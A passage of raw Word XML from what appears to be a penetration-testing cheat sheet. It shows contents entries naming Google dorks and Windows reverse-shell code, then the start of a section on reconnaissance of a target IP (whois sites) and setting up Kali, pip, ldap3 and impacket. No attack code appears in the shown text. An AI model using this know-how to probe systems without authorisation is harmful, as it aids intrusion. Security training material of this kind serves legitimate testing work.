        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37096C56" w14:textId="0ABE1E6E" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F8DF329" w14:textId="3AA217D6" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03B65686" w14:textId="273D318F" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Scripts and Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0521F214" w14:textId="24CA452B" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Google Dorks for VoIP and VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="3C11D162" w14:textId="77777777" w:rsidTr="00767461">
        <w:trPr>
          <w:trHeight w:val="245"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19DF2BFA" w14:textId="38BF043D" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21A6CBFF" w14:textId="131278AC" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3827" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16ECB5A1" w14:textId="46AC1029" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Scripts and Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1200999D" w14:textId="31B981C5" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00C84DDE">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003F50AF">
              <w:t>Reverse Shell Code (Windows executable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="163DAEE9" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRPr="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC9BB79" w14:textId="799A310D" w:rsidR="00834B5C" w:rsidRPr="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="901"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2388"/>
        <w:gridCol w:w="8028"/>
      </w:tblGrid>
      <w:tr w:rsidR="00834B5C" w14:paraId="2CA37942" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3D62EEE4" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>01.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="177371AE" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Preliminary</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Data Gathering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="42DCD350" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>Gather as much information as you can about the target network/single IP. This reconnaissance can be done using a variety of internet web pages, including:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r>
              <w:t>who.is</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●whois.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:tab/>
              <w:t>●</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="16E1E06A" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="166FA09C" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="53714D06" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>update OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CA4BC8A" w14:textId="2186B575" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r w:rsidRPr="00C208C7">
              <w:t>To ensure Kali is up to date with the latest version, use:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C208C7">
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>upgrade</w:t>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E06803" w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt</w:t>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">-get </w:t>
            </w:r>
            <w:r w:rsidR="00E06803" w:rsidRPr="00E06803">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>dist-upgrade</w:t>
            </w:r>
            <w:r w:rsidR="000329BC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="000329BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000329BC" w:rsidRPr="000329BC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="4AEA131B" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="726AF3A8" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0C127A3B" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3BE7E933" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidRPr="007F0770">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> command to learn more about the system you’re using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>kernel name</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>network name</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-m </w:t>
            </w:r>
            <w:r>
              <w:t>hardware</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>kernel version</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-r</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>kernel release</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">i </w:t>
            </w:r>
            <w:r w:rsidRPr="007F0770">
              <w:t>hardware-platform</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-o</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> os version</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r>
              <w:t>processor</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A67CB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-a </w:t>
            </w:r>
            <w:r>
              <w:t>show all of these</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049266F" w14:paraId="334D047B" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="10EBDAE3" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4338F568" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>python3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B2B606F" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>Make sure your python scripting is up to date, use this command:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1F715E" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00460425">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="0073701B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="0073701B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>python3-pip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049266F" w14:paraId="68ECC525" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2CB1BAA7" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="39525596" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>pip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26AA28D2" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>First of all, install pip using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">pip  </w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Then you can check for updates and update various packages by using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> pip </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">ldap3 </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-U      </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049266F" w14:paraId="422A1B52" w14:textId="77777777" w:rsidTr="0049266F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5E5419DF" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
              <w:t>01.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2388" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5B715C66" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>impacket</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E02E51">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(There is more about impacket later on)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26F28D79" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRPr="00E02E51" w:rsidRDefault="00834B5C" w:rsidP="00834B5C">
            <w:r>
